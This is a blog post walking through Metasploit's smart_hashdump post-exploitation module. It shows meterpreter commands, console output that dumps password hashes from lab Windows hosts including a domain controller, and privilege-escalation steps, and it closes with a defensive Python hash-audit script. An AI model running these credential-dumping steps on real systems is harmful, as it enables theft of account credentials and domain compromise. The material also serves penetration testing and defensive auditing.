Friday, June 22, 2012

Dump Windows hashes using smart_hashdump module


Smart_hashdump module by Carlos Perez
Features:
It first checks the privilege level and OS.
It will check if the target is a Domain Controller.
Based on this information it will prefer reading the registry to get the hashes; if that is not possible, it will inject into the lsass process where it can. For Domain Controllers it will use the injection into lsass.
If the target is a Windows 2008 server and the process is running with admin privileges, it will attempt to get SYSTEM privilege using getsystem. If it gets SYSTEM privilege, due to the way the token privileges are set it still cannot inject into the lsass process, so the code will migrate to a process already running as SYSTEM and then inject into the lsass process.
If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin, it will run getsystem and use the read registry method.
On Windows 2003/2000/XP it will use getsystem and, if successful, it will use the read registry method.
Script:
    meterpreter > run smart_hashdump -h
    Meterpreter Script for automating the dumping of local accounts from
    the SAM Database and if the targets host is a Domain Controller the
    Domain Account Database using the proper technique depending on 
    privilage level, OS and Role of host.
    OPTIONS:
        -h        Help menu.
        -l   Log folder to save results, if none provided default log path will be used.
        -s   Try to get SYSTEM Privilege
Module:
    msf exploit(handler) > use post/windows/gather/smart_hashdump 
    msf post(smart_hashdump) > info
           Name: Windows Gather Local and Domain Controler Account Password Hashes
         Module: post/windows/gather/smart_hashdump
        Version: $Revision$
       Platform: Windows
           Arch: 
           Rank: Normal
    Provided by:
      Carlos Perez 
     
    Description:
      This will dump local accounts from the SAM Database and if the 
      targets host is a Domain Controller the Domain Account Database 
      using the proper technique depending on privilage level, OS and Role 
      of host.
    msf post(smart_hashdump) > show options 
    Module options (post/windows/gather/smart_hashdump):
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
       SESSION                     yes       The session to run this module on.
Both use the same calls and print almost the same messages, so let's use the post module, since that is what most of the code is moving to. First, let's run it on a Windows 2008 R2 DC:
    meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
    [*] Running module against WIN2K8R2-01
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
    [+]     This host is a Domain Controller!
    [*] Dumping password hashes...
    [*] Trying to get SYSTEM Privilege
    [+] Got SYSTEM Privilege
    [*] Migrating to process owned by SYSTEM
    [*] Migrating to wininit.exe
    [+] Successfully migrated to wininit.exe
    [+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
    [+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
    [+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
    [+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::
On a Windows 7 System with UAC Disabled as Administrator:
    meterpreter > run post/windows/gather/smart_hashdump
    [*] Running module against WIN701
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
    [*] Dumping password hashes...
    [-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
    [-] Try setting GETSYSTEM to true.
    meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
    [*] Running module against WIN701
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
    [*] Dumping password hashes...
    [*] Trying to get SYSTEM Privilege
    [+] Got SYSTEM Privilege
    [*]     Obtaining the boot key...
    [*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
    [*]     Obtaining the user list and keys...
    [*]     Decrypting user keys...
    [*]     Dumping password hashes...
    [+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
On a Windows 7 System as Administrator with UAC:
    meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
    [*] Running module against WIN-KVJG16GEMOJ
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
    [-] Insufficient privileges to dump hashes!
Sadly, UAC does a good job of blocking hash dumping even as Administrator; it will even block getsystem.
On a Windows XP System:
    meterpreter > run post/windows/gather/smart_hashdump
    [*] Running module against TEST-01BCDAF47C
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
    [*] Dumping password hashes...
    [+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
    [+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
    [+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
     
    meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
    [*] Running module against TEST-01BCDAF47C
    [*] Hashes will be saved to the Database if one is connected.
    [*] Hashes will be saved in loot in John Password File format to:
    [*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
    [*] Dumping password hashes...
    [*] Trying to get SYSTEM Privilege
    [+] Got SYSTEM Privilege
    [*]     Obtaining the boot key...
    [*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
    [*]     Obtaining the user list and keys...
    [*]     Decrypting user keys...
    [*]     Dumping password hashes...
    [+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
    [+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
    [+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
On XP and Windows 2003, if you are an administrator you can dump hashes with no problem, and getsystem will succeed.
To get a list of all the accounts and hashes from the main console:
    msf exploit(handler) > db_creds 
    [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
    [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
    [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
    [*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
    [*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
    [*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
    [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
    [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
    [*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
    [*] Found 9 credentials
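
An added example, not part of the original post or of Metasploit: a short Python audit of the `user:rid:lm:nt:::` lines shown above, reporting accounts that still store an LM hash, accounts whose NT hash is that of an empty password, and NT hashes shared between accounts on different hosts. The function names are hypothetical; the sample records are copied from the module output on this page.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# (host, dump line) pairs copied from the module output shown on this page.
SAMPLE = [
    ("192.168.1.234", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::"),
    ("192.168.1.234", "testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::"),
    ("192.168.1.224", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"),
    ("192.168.1.224", "adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::"),
    ("192.168.1.113", "Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::"),
    ("192.168.1.113", "HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::"),
    ("192.168.1.113", "SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::"),
]

def parse(line):
    """Split one 'user:rid:lm:nt:::' line into its four fields."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()

def audit(records):
    """Return (finding, subject) tuples for weak credential storage and reuse."""
    findings, by_nt = [], defaultdict(list)
    for host, line in records:
        user, _rid, lm, nt = parse(line)
        who = f"{user}@{host}"
        if lm != EMPTY_LM:
            # A real LM hash is present (seen here only on the XP host).
            findings.append(("lm-hash-stored", who))
        if nt == EMPTY_NT:
            findings.append(("blank-password", who))
        else:
            by_nt[nt].append(who)
    # The same NT hash on several accounts means the same password is in use.
    for accounts in by_nt.values():
        if len(accounts) > 1:
            findings.append(("shared-password", tuple(sorted(accounts))))
    return findings

if __name__ == "__main__":
    for finding, subject in audit(SAMPLE):
        print(finding, subject)
```

Findings of this kind are addressed by disabling LM hash storage and by giving each host a unique local administrator password.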
